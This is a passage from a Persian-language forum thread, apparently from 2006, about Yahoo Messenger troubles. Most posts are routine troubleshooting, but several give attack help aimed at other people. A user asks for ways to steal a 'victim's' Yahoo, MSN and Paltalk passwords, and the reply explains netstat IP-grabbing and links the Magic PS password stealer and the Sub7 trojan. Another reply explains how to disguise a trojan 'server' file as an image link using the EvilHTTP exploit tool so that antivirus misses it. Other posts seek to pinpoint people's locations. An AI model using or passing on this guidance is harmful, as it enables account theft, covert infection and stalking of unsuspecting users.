PDA

نسخه کامل مشاهده نسخه کامل : مباحث و مشکلات نرم افزار یاهو مسنجرYahoo Messenger

صفحه ها : 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

reza-abadan
26-02-2006, 15:12
ba salame mojadad: manzoram dar bala barnameye chatte PALTALK bood version 8.2
Fadaaaaaaaaaaa

*NashenaS*
26-02-2006, 17:11
Ashkan jan salam va khaste nabshi, vaghean ke karet doroste va man hesabi lezat ordam az tamamiye matalebi ke to in forum neveshti.
haghighat ine ke man ziyad ba pc ashena nistam ama mikhastam age momkene barnamei moarefi koni baraye bedest avardane 1: Ip pc victim 2: bedst avardane yahoo password victim to jadidtarin version yahoo 3: agar PALTAL ra mishenasi barnamei baraye ---- kardane id va password victim onja 4 4: ---- password MSN messenger victim
midonam ketaghazaye ziyadi hast ama besiyar mamnoon misham ke dar har moredi ke mitoni komaki koni.
ba behtarine dorood ha va khaste nabshi

جناب رضا ابادان عزيز...
ممنون از نظر لطفت...
در مورد چيزهايي كه خواسته بودي... من در Paltalk و MSN زياد وارد نيستم اما شايد براي MSN بتونم گير بيارم.

نحوه بدست اوردن اي پي سيستم مقابل در هنگام چت:

پیدا کردن ایپی در چت یه خورده دردسر داره... اما توضیح می دم امیدوارم که متوجه بشین.

برای این کار از دستور Netstat استفاده می کنیم... شما راه زیر رو دنبال کنین:

Start / Run /... و دستور cmd رو در اون تایپ می کنی و Enter رو می زنی.

صفحه سیاهی میاد که در اون شما می تونین تایپ کنی... حلا شما به دستور netstat -n نیاز داری.

وقتی که شما این دستور رو تایپ کرده و Enter رو می زنی. صفحه ای به این صورت جلوی شما میاد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

به طور خلاصه.... شما با ستون Foreign Address کار دارین... IP هایی که فکر می بینین به همراه Port نمایش داده میشن... مثلا اینجا که به قرمز نشون دادم 38.115.131.131 ای پی و 2240 پرت مربوطه هست. شما خود به خود با توجه برنامه هایی که به اینترنت وصل می شن از این ایپی ها خاهید داشت.. پس بهتره همش و ببندید و فقط پی ام تون با طرف باز باشه که راحت تر بتونین این کارو انجام بدین. خوب حالا این ایپی که به دست می ارین رو تست می کنین و می بینین که کدومش مال طرفه:

سایت تست کردن هم: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کلی سایت برای این کار هست.. این فقط نمونشه.

--------------------------

نحوه بدست اوردن پسورد رو هم در پست هاي قبلي توضيح دادم...
موفق باشي. :)

reza-abadan
26-02-2006, 18:15
اشکان جان فدات . واقعان دست مريزاد.
فقط يه خواهش کوچيکه ديگه.
توي کدام صفحه اين فوروم توضيحات شمارو در مورد هک پاسورد و اي د ببينم؟
کلي ارادددددددددت

*NashenaS*
26-02-2006, 20:49
اشکان جان فدات . واقعان دست مريزاد.
فقط يه خواهش کوچيکه ديگه.
توي کدام صفحه اين فوروم توضيحات شمارو در مورد هک پاسورد و اي د ببينم؟
کلي ارادددددددددت
صفحات 5 و 6 .
Magic PS + Sub7

KING ESFANDIYAR
27-02-2006, 16:13
خيلي عاليه..................ممنون..........
فقط اگه براي هر برنامه يه اموزش خيلي كوتاه هم بذاريد كاملتر ميشه................البته كا ربا اونها راحته ولاي خوب براي مبتديا عالي ميشه

koochooloo
27-02-2006, 16:24
salam man fgarsi nadaram vali dar javabe omid bayad begam shoma vase phantom vc file neet mikhay ke serch koni peyda mikoni hajmesham 23.3albate hododan hast ono berizi omid jan dige rahat mishi va phantom va bagie baz mishe eshkale boterha ham moge login kardan ba in barname hal mishe site man....[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] man sar bezanid ashkan jan ba ejazat be esme khodet barname hato mizaram ya age dost dari ba ham hamkari konim behet email ya pm bede ya hagh to sitam hame chiz hast

*NashenaS*
27-02-2006, 19:14
salam man fgarsi nadaram vali dar javabe omid bayad begam shoma vase phantom vc file neet mikhay ke serch koni peyda mikoni hajmesham 23.3albate hododan hast ono berizi omid jan dige rahat mishi va phantom va bagie baz mishe eshkale boterha ham moge login kardan ba in barname hal mishe site man....[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] man sar bezanid ashkan jan ba ejazat be esme khodet barname hato mizaram ya age dost dari ba ham hamkari konim behet email ya pm bede ya hagh to sitam hame chiz hast

سلام...
مشكلي نداره مطالب رو بزاري به اسم لطفا... اگه خواستي مي تونم كمكت كنم... موفق باشي.
:)

omid.com
27-02-2006, 20:34
با سلام خدمت تمام دوستان كوچولوي عزيز اون فايل كه ميگي 2 ساعت دانلودش طول مي كشه اگه فشرده شدشو داري لينكشو برام بزازي ممنون. ضمنا" هنگام نوشتن مطلب مي توني زبان رو فارسي انتخاب كني .دوستار شما اميد

reza-abadan
28-02-2006, 01:20
اشکان جان با سلامه مجدد براي يک مزاحمت و سوال ديگه
چطوري ميشه فايله سرور را براي کسي فرستاد که ان را اجرا کنه بدونه انکه خودش بفهمه يا انتي ويروسش يا انتي سپاي اون را کشف کنه
فداي تو

omid.com
28-02-2006, 01:40
با سلام وخسته نباشيد كوچولوي عزيز بعد از 2 ساعت تمام كه طول كشيد وفايلو دانلود كردم بازم يك پيغام ميده كه در آخر برات مينويسم يك سوال ديگه هم داشته و اينكه توي اون برنامه كه اسمش سايلنس آف ديس( اس .او دي ) ميباشد هموني كه گفتي به نظرت از اس تي پس بهتره گفتي كه بايد از فايل پوشه شماره سريال رو توقسمت سريال بنويسيم و ري استار كنيم اگه زحمت نيست اون شماره ومحلي كه بايد بنويسيم رو دقيقا" برام توضيح بده اگه عكسشو انداختي كه بهتر منتظر راهنمايت هستم چون خيلي كلافم كرده در آخر پيغام فانتوم رو برات مي نويسم قربانت اميد D:\WINDOWS\Microsoft.net\Framework\v1.1.4322\mscor wks.dll could not be loaded

koochooloo
28-02-2006, 01:54
sharmande fonte farsi nadaram
ashkan jan hatman ba id man ya emaileman ke dar sit hast tamas begir age dost dashte bashi esmeto jozve modiran bezaram ke ba ham kar konim akhe man dast tanham va chand ta sit kar daram zemnan man be har kasi kar nemikonam shoma to karet makhsosan amozesh harf nadari
omid jan file shoma to safe 2 zire phantom vc zade file neet ke vase baz shodane in barname hatman lazeme fagat hajmesh ye khorde ziade
ashkan montazere javabet hastam
bename khodetam barname gozashtam
omid varam khodet biyay barname bezari ya hagh

koochooloo
28-02-2006, 02:35
omid jan fonte farsi nist azizam vagar na manam farsi mineveshtam
zemnan har barname mikhay to site man hast
vase vc keshiam ke stb10.5ya9.7 hast ke ye khorde degat koni peyda mikoni samte chapam meno hast va mozoha hast masalan vc keshi to gesmate barnamehaye vc keshi hast
ham phantom ham sam2va 4 ham stb 10.5va9.7 har chi mikhay fagat begard ya to nazarat bego ashkan jan montazeretam ya hagh soali bood to sitam beiig hatman komak mikonam
ta onja ke betonam komaketon mikonam
man babak 29 sale tehran reshte aslim pc karam weblag nevisi va....azad
inam moshalkhasate man vase rahat tar bodan ba shoma dostan
ya hagh

koochooloo
28-02-2006, 02:42
OMID JAN FILE NET KE TO ERORETAM HAST HAMINE INO DL KARDI RE START KON BAD DOBARE PHANTOMO BAZ KON
ZEMNAN INAM SERIALE BARNAME KE MIKHASTI TO GESMAT SERIAL BERIZ JAYE ADI KE HAST INO BEZAR
kEY s.o.d.------> E099E1C1
INO onja to poshe fil ke zade Seriale ke ye file feshorde hast beriz eshtebah nakonia fagat E099E1C1 ino beriz onja ke baz kardi file zipo tosh ye barname hast kilik kon azat in serilalo mikhd bede badam re start kon tamam
vali be nazare man shoma sam 4 ro ke taze gozashtamo dl kon ke hich moshkeli nadare va asone vase shoma badan he hr fe ey shodi boro sorage stb ya phantoom

omid.com
28-02-2006, 03:57
كوچولو جان سلام ببين من اينكارارو كردم و جواب نداد 1برنامه رو باز كردم و يك سري پوشه باز شد كه اوليش زيپ شدس و نوشته سريال 2- روي اون كليك كردم و باز يك سري پوشه باز شد كه اوليش نوشته بيناريس3- ئاونم باز كردم و يك ويندو باز شد كه در قسمت بالاش نوشته چوس دراو زيزش نوشته اينفورميشن و پاين نوشته نيو سرييال نامبر 4- من در اين قسمت اون سريالو نوشتم كليد چنچ سريالو كليك كردك ورياستار ولي باز همون پيغامو داد .آيا اون فايلي كه2 ساعت لودش طول كشيد رو بايد كار خواستي باهاش بكنم در غير اين صورت راهنمايي كون قربان شما اميد . ما يه اشكان كه بيشتر نداريم كجا ميخواي ببزيش :rolleye:

omid.com
28-02-2006, 12:13
اشكان گل سلام يك سوال داشتم بعضي از بوترها مثلا" همون آندر تاكر از مافيا محلي براي لود كردن آيديا نداره و در صفحه اصليشم نمي شه تايپ كرد .و باید از قبل آیدی رو بدیم .درسته

armin_goooodboy
28-02-2006, 16:38
سلام عزیزان
کامپیوتر من حدودا دو روز پیش مبتلا به کرم w32.jeefo شده بود
و حدود 1200 تا از این ویروس تو سیستمم بود که با کمک مک آفی پاکشون کردم
حالا سیستمم کاملا سالمه
فقط مشکلم اینه که دیگه یاهو مسنجر اجرا نمیشه
وقتی روش کلیک میکنم تا اجرا شه ارور report میده
حتی چند بار کامل پاکش کردم و دوباره نصب کردم
بازم همینه و باید dont send رو بزنم
حالا به نظر شما چی کار باید بکنم
ممنون

*NashenaS*
28-02-2006, 16:56
اشكان گل سلام يك سوال داشتم بعضي از بوترها مثلا" همون آندر تاكر از مافيا محلي براي لود كردن آيديا نداره و در صفحه اصليشم نمي شه تايپ كرد ميشه بفرماييد با كدوم گزينه آي ديهارو لود ميشه كرد ممنونتم .اميد

اميد عزيز سلام.
من چيزي به اون اسم نديدم...
مي شه لينك بدي ؟
ممنون :)

omid.com
28-02-2006, 17:37
اشكان جان توتاپيك نيست منضورم همونيه كه توي ني پو تو گزاشتيد دقيقا" در صفحه اصلي 14 دهمين نرم افزاري كه معرفي شده يه سري بزن جواب مارو بنويس ممنونتم آقا اشكان نازنين. قربانت اميد

kazemfdisk
01-03-2006, 01:12
سلام ارمین جان من هم مشکل شما رو دارم بعضی از نرم افزارها رو که نصب میکنم همینو میده قبلا ویرورس داشت
فکر کنم باید یه ویندوزه دیگر نصب کنیم

koochooloo
01-03-2006, 02:11
be man sar bezanid :biggrin:
fonte farsi nadaram sharmande :blush:

koochooloo
01-03-2006, 02:12
omid jan on filo ke dl kardio ke neet hast esmesh ejra kon yani rosh kilik kon khodesh chand dagige bad ejramishe bad restart kon badesham phantom ro baz kon halesho bebar
zemnan to sitam spsa4.1 zade
onam dl kon ke on az ina rahat tare va vc khob mikeshe :blink:
sitam
:cool: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
:biggrin: movafag bashi

armin_goooodboy
01-03-2006, 11:21
سلام عزیز
آره فکر کنم
اما گفتم قبل از عوض کردن ویندوز سوال کنم شاید بشه کاریش کرد
من تا 1 هفته دیگه صبر میکنم
اگه راهشو پیدا نکردم اونوقت ویندوزمو عوض میکنم
شما هم صبر کنی بهتره
بای

omid.com
01-03-2006, 17:31
كوچولو داداشي سلام خدمت شما عرض شود كه اون برنامه نترو اجراهم كردم ولي وقتي فانتومواجرا ميكنم پيغامه زيرو ميده.قربانت اميد D:\WNDOWS/Microsoft.NET\Framework\v1.1.4322\mscrowks.dll could not be loaded

RONN!E
01-03-2006, 20:29
شاید اگه در یه درایو دیگه نصب کنی مشکلی پیش نیاد.

saeid_saeid
01-03-2006, 21:27
ايول با با . ايول.
من تازه اين تاپيو ديدم. اگه يه كم واسش تبليغات بكني بهتره.:d

armin_goooodboy
01-03-2006, 21:55
سلام حمید جان
این کار رو هم کردم نشد
ممنون

saeid_ronaldo
01-03-2006, 21:58
بله بايد ويندوزتو عوض كني و حتما قبلش درايو سي تو فرمت كني

Mohammad
01-03-2006, 22:32
شاید بتونی از System Restore هم کمک بگیری و بهترین راهش اینه که از اول ویندوز بریزی...

armin_goooodboy
01-03-2006, 22:36
سلام
سعید جان ممنون
فکر کنم باید این کارو بکنم
محمد جان از شما هم ممنون
اما سیستم ریستور من فقط میتونه برگرده به همون زمانی که 1200 تا ویروس داشتم
که به ریسکش نمی ارزه
ممنون دوستان
حال ویندوز عوض کردن ندارم
بی خیال مسنجر میشم
راستی
نمیشه با مسنجر دیگه ای بتونم آی دی یاهو رو باز کنم؟
بای

*Medivh*
01-03-2006, 22:55
از اينجا ميشه...

armin_goooodboy
01-03-2006, 23:06
*Medivh* عزیز
واقعا از لطفت ممنون
حیلی لطف کردی
فقط حیف که نمیشه آف خوند
یعنی آف نمیاد؟

kazemfdisk
02-03-2006, 00:41
سلام ارمین جان
با نر مافزار ترلین میتونی با یاهو بالا بیایی اون با هرچند ایدی دلت بخواد سرعتشم توپه تو 3 سوط کانت میشه
فکر کنم اگر باهاش کار کنی دیگه دور یاهو مسنجر رو خط میکشی

R e Z a
02-03-2006, 01:02
سلام...
شما اگه تو اين سايت بريد آف هاي مسنجر هم مي يادش....عين ياهو مي مونه فقط تو محيط اينترنت

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

يا مي توني وقتي ياهو رو uninstall كردي بري تو رجيستري و سرچ كني yahoo همه رو پاك كن و بعد دوباره مسنجر رو نصب كن.

:) :)

*NashenaS*
02-03-2006, 01:34
be man sar bezanid :biggrin:
fonte farsi nadaram sharmande :blush:

دوست عزيز...
شما براي تايپ در فروم نيازي به فونت فارسي ندارين..
فقط كافيه جاي كلمات رو بلد باشين...
اين لين به شما كمك مي كنه..
موفق باشيد.

ايول با با . ايول.
من تازه اين تاپيو ديدم. اگه يه كم واسش تبليغات بكني بهتره.:d

سعيد عزيز... لطف داري ...
شما زحمت تبليقش رو به عهده بگير :tongue:

KING ESFANDIYAR
02-03-2006, 13:53
سلام دوستان

برنامه اي رو ميشناسيد كه در زمان چت Ip رو به طور دقيق و سريع به ما بده؟

استفاده از روش Cmd و Netstat -an كار وقت گيريه..

اگه روش بهتر ميشناسيد بفرماييد

KING ESFANDIYAR
02-03-2006, 13:54
در ضمن برنامه يا سايت دقيقي رو ميشناسيد كه Location هح مارو به صورت كالما دقيق بده؟

بعضي از اين سايتها رو كه با هاش كار كردم ادرس دقيق نميده

*NashenaS*
02-03-2006, 17:02
در ضمن برنامه يا سايت دقيقي رو ميشناسيد كه Location هح مارو به صورت كالما دقيق بده؟

بعضي از اين سايتها رو كه با هاش كار كردم ادرس دقيق نميده

دوست عزيز....
در مورد سوال اولتون بايد بگم هنوز نه...

در مورد سوال 2: برنامه Neotrace اين كار رو به خوبي انجام ميده ...

موفق باشيد.

reza_20
02-03-2006, 22:44
سلام به همه من دنبال برنامه مجيك پس ميگردم لطفا كمكم كنيد

*NashenaS*
02-03-2006, 23:05
سلام به همه من دنبال برنامه مجيك پس ميگردم لطفا كمكم كنيد

Magic PS 1.5 SE: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Sub7: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

saeid_saeid
03-03-2006, 11:09
اشکان جان با سلامه مجدد براي يک مزاحمت و سوال ديگه
چطوري ميشه فايله سرور را براي کسي فرستاد که ان را اجرا کنه بدونه انکه خودش بفهمه يا انتي ويروسش يا انتي سپاي اون را کشف کنه
فداي تو
با اجازه اشكان جون من جواب مي‌دم.
شما مي‌توني با EvilHTTP اين كارو بكني.كه اينجا لينكشو مي‌زارم.

طرز كارشم اينجوريه كه تو قسمت Server فايل سرورتو انتخاب مي‌كني و تو قسمت Exploit يكي از Exploit هايي كه تو فولدر همين برنامه هست( بهتره از mpeg.exp استفتده كني) رو انتخواب مي‌كني. بعد تو مستطيل پايينش اول //:http و بعد IP خودتو تايپ مي‌كني.مي‌توني بعد از IP يه چيزاي ديگه مثل اسم يه فايل مثلا Mypic.jpg رو هم تايپ كني. براي مثال: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] و بعد اين لينكو واسه طرف مقابل بفرستي.

سعيد عزيز... لطف داري ...
شما زحمت تبليقش رو به عهده بگير :tongue:

رو چشم جيييييگگگگگررررررررر...

adameh_bahal
03-03-2006, 13:19
سلام
من وقتی ميخواستم ويندوزمو عوض کنم archive yahoo رو که با فرمت .dat بود، کپی کردم تو يه درايو ديگه که بتونم بعدن با yahoo archive decoder يا super archive decoder بخونم ولی حالا که اين کارو کردم با هيچکدوم نميتونم بخونم
حالا ميخواستم ببينم کاری نميشه کرد؟

metax
03-03-2006, 20:14
سلام نمیخواستم یه تاپیک جدیدبازکنم اینه که گفتم مشکلمواینجابگم من مشکلم بایاهومسنجراینه که نمیتونه برای صدا و وب کم باسرورهای یاهوارتباط برقرارکنه .فایروال ویندوزم روی off هستش .هیچ برنامه وآنتی ویروسی هم روی کامپیوترم نیست علتش چی میتونه باشه؟

Mohammad
03-03-2006, 21:10
شما فقط فایل های تنها رو کپی کردین یا با پوشش؟
اگه فایل های تنهارو کپی کردین فکر نمی کنم بشه...

korosh bozorg
03-03-2006, 23:37
دوست گرامی
مشکل ریپورت رو من هم دارم
دقیقا نمیدونم چرا اینجوری هست. ربطی هم به ویروس نداره.
اما راه حلش اینه که تا زمانی که ویندوز را دوباره نریختی میتونی از مسنجر نسخه ی 5 بهره ببری. به آسونی بالا میاد و هیچ مشکلی نداره.

hadi3596
04-03-2006, 02:35
اين رو تست کن

adameh_bahal
04-03-2006, 12:51
شما فقط فایل های تنها رو کپی کردین یا با پوشش؟
اگه فایل های تنهارو کپی کردین فکر نمی کنم بشه...
با پوشه کپی کردم

adameh_bahal
04-03-2006, 12:52
اين رو تست کن
لينکتون مشکل داره

mehdidll
04-03-2006, 13:02
سلام من قبالاتست کردم مشکلی نبود با ÷وشه یا بدون ÷وشه اصلا ربطی نداره

adameh_bahal
04-03-2006, 17:41
سلام من قبالاتست کردم مشکلی نبود با ÷وشه یا بدون ÷وشه اصلا ربطی نداره
ولی برای من قبلی ها رو که کپی کردم decode نميکنه

KING ESFANDIYAR
04-03-2006, 18:39
دوست عزيز....
در مورد سوال اولتون بايد بگم هنوز نه...

در مورد سوال 2: برنامه Neotrace اين كار رو به خوبي انجام ميده ...

موفق باشيد.

اگه يه لينك براي دانلود بفرماييد ممنون ميشم.........

Reza P30
04-03-2006, 20:58
ببخشيد
بي زحمت در مورد اخر يه توضيح هايي بدين
چون ازمن user&password مي خواد

Reza P30
04-03-2006, 21:05
سلام
ببخشيد در مورد اخر توضيح بده
از من user & PASSWORD می خواد

armin_goooodboy
04-03-2006, 22:08
سلام
دوستان عزیز
از راهنمایی همتون کمال تشکر رو دارم
با یاهو مسنجر 5 میشه
خیلی لطف کردید
ممنون

احمدزاده
05-03-2006, 23:32
سلام دوستان
يه نرم افزاري ميخوام كه بتونم باهاش آيديم رو از تو عد ليست ديگران حذف و خارج كنم
فقط خواهشا نرم افزار Dab3 رو معرفي نكنيد كه خودم دارم و تش تموم شده چون مينويسه تايم اوت
اگه چيز ديگه اي داريد ممنون ميشم معرفي كنيد

*NashenaS*
06-03-2006, 00:13
با اجازه اشكان جون من جواب مي‌دم.
شما مي‌توني با EvilHTTP اين كارو بكني.كه اينجا لينكشو مي‌زارم.

طرز كارشم اينجوريه كه تو قسمت Server فايل سرورتو انتخاب مي‌كني و تو قسمت Exploit يكي از Exploit هايي كه تو فولدر همين برنامه هست( بهتره از mpeg.exp استفتده كني) رو انتخواب مي‌كني. بعد تو مستطيل پايينش اول //:http و بعد IP خودتو تايپ مي‌كني.مي‌توني بعد از IP يه چيزاي ديگه مثل اسم يه فايل مثلا Mypic.jpg رو هم تايپ كني. براي مثال: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] و بعد اين لينكو واسه طرف مقابل بفرستي.

رو چشم جيييييگگگگگررررررررر...

ممنون...

اگه يه لينك براي دانلود بفرماييد ممنون ميشم.........
لينك دانلودش رو براي شما مي زارم... براي كركش - اگه لازم داشته باشه - واقعا وقت ندارم.. اما اگه موفق نشدي پيدا كني خبر بده.

Link ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

سلام
ببخشيد در مورد اخر توضيح بده
از من user & PASSWORD می خواد
لطفا مشخص كنيد منظورتون كدوم پست بود.

يه نرم افزاري ميخوام كه بتونم باهاش آيديم رو از تو عد ليست ديگران حذف و خارج كنم
فقط خواهشا نرم افزار Dab3 رو معرفي نكنيد كه خودم دارم و تش تموم شده چون مينويسه تايم اوت
براتون مي زارم.

موفق باشيد. :)

R e Z a
07-03-2006, 01:41
سلام...

آقا من هر چي بوتر از نت دانلود مي كنم اين پيغام رو مي ده ....اعصابم ريخته بهم...يكي به داد ما برسه :)

جالبي اين جاست كه همشون همين ارور رو مي دن

*NashenaS*
07-03-2006, 02:19
سلام...

آقا من هر چي بوتر از نت دانلود مي كنم اين پيغام رو مي ده ....اعصابم ريخته بهم...يكي به داد ما برسه :)

جالبي اين جاست كه همشون همين ارور رو مي دن

خوب رضا جون دادشي...
اين و زودتر بگو ديگه مرد مومن...
اين فايل و دانلود كن و بزار توي فولدري كه بوتر توشه...

Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

خبرش و بده...

احمدزاده
07-03-2006, 19:22
بابا پس چي شد اين نرم افزار حذف كردن آيدي از ليست ديگران
پيدا نشده؟؟؟

K053_LSH_KV90
07-03-2006, 19:39
از لينك بالا دانلود كن
--------
اشكان جان فكر ميكنم كه اون فايل بايد تو شاخه سيستم كپي بشه و بعد هم تو run
بايد اين دستور تايپ بشه
reg svr32 MSINET.OCX

*NashenaS*
07-03-2006, 20:21
پيدا نشده؟؟؟

با استفاده از این برنامه میتوانید ID خودتان را از لیست یاهو ID دیگران حذف کنید بدون این که نیاز داشته باشید به آیدی آنها وارد شوید !

Deny Buddy 1.0

Download ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

1- در قسمت Your Yahoo ID باید آیدی اصلی خودتان که میخواهید از لیست طرف پاک شود را قرار دهید.

2- در قسمت Your Password هم باید پسوورد آیدی خورتان را قرار دهید .

3- روی Login کلیک کرده و منتظر شوید تا Status در پایین برنامه به Conected تغییر کند و دکمه ی Logout روشن شود.

4- حال در قسمت Type UseName Here آیدی طرفی که میخواهید آیدی خود را از ادد لیست آن پاک کنید را قرار دهید.

5- روی Send The Deny Request کلیک کنید .

حال آیدی شما از لیست طرف پاك شده.

اشكان جان فكر ميكنم كه اون فايل بايد تو شاخه سيستم كپي بشه و بعد هم تو run
بايد اين دستور تايپ بشه
reg svr32 MSINET.OCX
بله... جفتش اخر همون جا ميره...ممنون.

موفق باشيد :)

Tornado2800
07-03-2006, 21:00
با استفاده از این برنامه میتوانید ID خودتان را از لیست یاهو ID دیگران حذف کنید بدون این که نیاز داشته باشید به آیدی آنها وارد شوید !

Deny Buddy 1.0

1- در قسمت Your Yahoo ID باید آیدی اصلی خودتان که میخواهید از لیست طرف پاک شود را قرار دهید.

2- در قسمت Your Password هم باید پسوورد آیدی خورتان را قرار دهید .

3- روی Login کلیک کرده و منتظر شوید تا Status در پایین برنامه به Conected تغییر کند و دکمه ی Logout روشن شود.

4- حال در قسمت Type UseName Here آیدی طرفی که میخواهید آیدی خود را از ادد لیست آن پاک کنید را قرار دهید.

5- روی Send The Deny Request کلیک کنید .

حال آیدی شما از لیست طرف پاك شده.

بله... جفتش اخر همون جا ميره...ممنون.

موفق باشيد :)
اما ! این دیگه به خاطر تغییر سرور یاهو کار نمی کنه ! شما تست کردین ؟

Mohammad
07-03-2006, 21:23
شما قبل از اینکه پوشه هارو کپی کنید اول با مسنجر On بشید Message Archive رو فعال کنید و بعد از مدتی که فایل های Dat ساخته شدن اونوقت پوشه هارو کپی کنید...
به من که اینجوری قبلا جواب دادن....

hadi3596
07-03-2006, 22:26
ok hast

*NashenaS*
07-03-2006, 22:36
اما ! این دیگه به خاطر تغییر سرور یاهو کار نمی کنه ! شما تست کردین ؟
خير جديدن تست نكردم... اگه كار نمي كنه برنامه ديگه اي سراغ داريد بزاريد.
ممنون. :)

Wisdom
08-03-2006, 07:20
سلام دوستان
من يك نرام افزار , بوتر و يا هر چيز ديگه اي ميخواستم كه بتونم بفهمم كسي Invisible هستش يا Online
نميخوام از دعوت كردن به كنفرانس يا روش هاي مشابه استفاده كنم
يك راهي كه طرف اصلاً نفهمه
چون خودش اين كاره هستش !!!!!

مرسي و ممنون :happy:

omid.com
08-03-2006, 16:32
ba salam harkari kardam farsi tayp nakard agh mahmod boro be safeye 11 ye booter bename Y!coder hast ke in emkanato dare omid

K053_LSH_KV90
08-03-2006, 21:54
با اين نرم افزار مي توني چك كني

koochooloo
09-03-2006, 14:28
ba tashakor az hameye shoma be man sar bezanid
fonte farsi nadaram shar mande :blush:

koochooloo
09-03-2006, 14:32
BA YA INTAY KE BEHTARINE MISHE CHEK KON HAM BOOT KONI
HAM WEBESHO BEBINI VA.........
FONTE FARSI NADARAM SHAR MANDE
:happy: SOALI BOOD BE
:happy: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
sar bezanid ta komaketon konam
:biggrin: movafag bashin
:ohno: fonte farsi nadaram gor nazanid p30 dl ha

احمدزاده
09-03-2006, 16:02
سلام
بابا این نرم افزار آیدی چک کن که ببینه اینویزیبل هست یا نه که کار نمیکنه
رجیستر هم میخواد
تازه خودم رو اینویزیبل کردم نتونست بفهمه
راستی در مورد اون نرم افزار حذف آیدی از لیست دیگران خودم یه دونه پیدا کردم
ورژن جدید dab هستش دارم آپلودش هم كنم ميزارم براتون خداييش هم كار كرد كلي هم كيف كردم :biggrin: :biggrin:
فعلا

papiyoon
09-03-2006, 19:06
سلام دوستان
من يك نرام افزار , بوتر و يا هر چيز ديگه اي ميخواستم كه بتونم بفهمم كسي Invisible هستش يا Online
نميخوام از دعوت كردن به كنفرانس يا روش هاي مشابه استفاده كنم
يك راهي كه طرف اصلاً نفهمه
چون خودش اين كاره هستش !!!!!

مرسي و ممنون :happy:
بهترین برنامه برای این کار به نظر من Yintai هست
من 6 ماهه دارم ازش استفاده میکنم تا حالا 1 بار هم اشتباه نداشته
از اینجا دانلود کن [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

papiyoon
09-03-2006, 19:09
پيدا نشده؟؟؟
اینو امتحان کن [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
من 3-4 بار ازش استفاده کردم جواب داده

saeid_saeid
09-03-2006, 19:17
سلام پاپیروس جون.
می شه دوباره آپ لود کنی. چون داون لود نمی شه.

papiyoon
09-03-2006, 20:00
ببخشید تست نکردم
اینا دیگه مال پرشین گیگ هست کار میکنه 100%

Yintai

DaB3

*NashenaS*
09-03-2006, 22:02
سلام
رجیستر هم میخواد
ورژن جدید dab هستش دارم آپلودش هم كنم ميزارم براتون خداييش هم كار كرد كلي هم كيف كردم :biggrin: :biggrin:
فعلا
دوست عزيز...
درخاست كرده بودند كه هر برنامه اي غير از dab ... براي همين برنامه جديد گزاشته شد...

*NashenaS*
11-03-2006, 17:25
ميخواستم بدونم چطوري مي تونم ايميلم رو از صفحه روزگار پاك كنم
ترجيحا ايميل ياهو ولي اگه مال هاتميل رو هم توضيح بدين ممنون ميشم
فقط تورخدا نگين سه ماه بازش نكن حذف ميشه يه راه سريع و علمي تر البته اگه هست
ممنون

دوست من...
من از قديم يه لينكي رو دارم كه اين كارو مي كرد...
خودم هم باهاش كار نكردم... اما مي دم شما ممكن به دردتون بخوره...

Link ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

Lord348_8
12-03-2006, 21:22
دوست گرامي ،

بنده در قديم آيدي ياهو داشتم كه پسور آنرا فراموش كرده ام و چون خودم آيدي را نساخته بودم ، نميتوانستم پس بگيرم ( سوالات ) .

چطور ميتوانم آنرا پاك كرده و دوباره بسازم ؟

با تشكر

Lord348_8
12-03-2006, 21:32
Magic PS 1.5 SE: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Sub7: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اين Magic-PS روي ياهو مسنجر 7.5 كار مي كند ؟

Senator
12-03-2006, 21:55
سلام
رجیستر هم میخواد
فعلا
شما که گفتی داری آپلود ميکنی، پس چی شد؟ نمی خوای معرفی کنيش؟

silver_6009
13-03-2006, 02:03
عالي و خوب بود

*NashenaS*
13-03-2006, 02:39
دوست گرامي ،
بنده در قديم آيدي ياهو داشتم كه پسور آنرا فراموش كرده ام و چون خودم آيدي را نساخته بودم ، نميتوانستم پس بگيرم ( سوالات ) .
چطور ميتوانم آنرا پاك كرده و دوباره بسازم ؟
با تشكر
دوست من...
شما اگه يه مقدار منطقي به ماجرا نگاه كني مي بيني كه اين صحبت شما عين اين هست كه بخاي ايميل من يا هر كس ديگه رو حذف كني...(از طرف ياهو نگاه كن به اين قضيه) ... حالا خودت نظر بده!

اين Magic-PS روي ياهو مسنجر 7.5 كار مي كند ؟
بعيد مي دونم... يعني احتمال 90% نه...!
اما برنامه هاي جالب تري هستن... كه هم sub7 و هم magic رو مي زارن كنار...

عالي و خوب بود
ممنونم دوست عزيز...

Lord348_8
13-03-2006, 15:09
دوست من...

بعيد مي دونم... يعني احتمال 90% نه...!
اما برنامه هاي جالب تري هستن... كه هم sub7 و هم magic رو مي زارن كنار...

ممنونم دوست عزيز...

كدام برنامه ؟...بتواند پسورد را به خوبي آن بفرستد ؟

omid.com
14-03-2006, 04:38
